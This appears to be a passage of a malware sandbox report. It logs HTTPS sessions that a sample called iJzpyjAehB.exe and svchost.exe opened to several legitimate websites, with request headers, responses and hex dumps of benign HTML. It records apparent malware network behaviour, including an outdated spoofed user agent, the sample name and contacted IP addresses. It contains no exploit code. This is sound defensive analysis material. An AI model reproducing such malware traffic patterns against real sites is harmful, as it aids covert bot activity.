                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1064INData Raw: 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67 2f
                                                                                                                                                                                                                                                                        Data Ascii: orm-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing/


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        6192.168.2.65259383.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC135OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=99
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC249INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC252INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC282INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC290INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC298INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC306INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC314INData Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        60192.168.2.65546191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC861OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC862INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC864INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC880INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC896INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC912INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        61192.168.2.655627188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC862OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC879INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:17 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=isr6qohPZxqAHimNulCqzLBOVfkMUDlggprr%2FeIAovxJaqEI35jJvRLVQYhONcr4o3bnMgKYEajjs%2FpehultMTEFAbFdMu%2BVTuN5G%2BIODeOhc2k%2BxFeY4PId"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a82daae092ba-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC880INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC880INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        62192.168.2.655634172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC862OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC949INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:21 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:21 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xLdYZwhGugfdbQ9OXoMFj2vt5xmOhx1%2BKskin3PTQwdd0x5%2FGt%2FzVnpmo4B77L00LLyMyz27%2BSWxGb6bIdW6pK9HRJspjdcQpfZVDujVi7gUv4gMf3RC0aOn9pFFCEgS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a82db9df3804-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC949INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC949INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        63192.168.2.655685185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC862OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:17 UTC863INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:17 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
